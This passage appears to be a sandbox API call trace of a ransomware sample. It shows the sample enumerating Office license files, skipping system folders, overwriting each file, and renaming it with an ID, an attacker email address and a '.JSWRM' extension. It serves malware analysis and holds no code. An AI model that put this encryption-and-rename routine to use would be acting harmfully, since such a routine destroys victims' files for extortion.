cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0106.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240f20, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0106.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0106.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0106.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0106.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.206] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20904) returned 1 [0106.206] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51a0) returned 0x24c1d0 [0106.207] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51a0, lpOverlapped=0x0) returned 1 [0106.209] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.209] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51a0, lpOverlapped=0x0) returned 1 [0106.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.209] CloseHandle (hObject=0x45c) returned 1 [0106.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0106.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0106.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0106.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0106.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0106.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0106.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.210] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0106.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0106.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0106.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0106.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0106.211] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7987d27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7987d27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7a92d77, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="ONA2B9~1.XRM")) returned 1 [0106.211] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.211] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.211] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.211] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.211] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.211] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.211] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.211] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.211] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.211] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0106.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2412b8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0106.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241308, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0106.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0106.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0106.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.212] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11592) returned 1 [0106.212] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.212] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.311] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.311] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.311] CloseHandle (hObject=0x45c) returned 1 [0106.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0106.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0106.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0106.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0106.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0106.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0106.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.312] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0106.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0106.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0106.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0106.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0106.326] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a206b8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7a206b8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7b9dddc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="ON6A5B~1.XRM")) returned 1 [0106.327] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0106.327] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0106.327] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0106.327] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0106.327] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0106.327] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0106.327] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0106.327] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.327] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0106.327] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0106.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0106.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0106.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0106.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0106.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.328] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19937) returned 1 [0106.328] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0106.328] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0106.331] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.331] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0106.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.331] CloseHandle (hObject=0x45c) returned 1 [0106.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0106.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0106.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0106.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0106.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0106.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0106.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.332] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0106.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0106.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0106.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0106.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.333] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe793b841, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe793b841, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7a206b8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_Retail-pl.xrm-ms", cAlternateFileName="ON2C01~1.XRM")) returned 1 [0106.343] lstrcmpiW (lpString1="OneNoteR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0106.343] lstrcmpiW (lpString1="OneNoteR_Retail-pl.xrm-ms", lpString2="..") returned 1 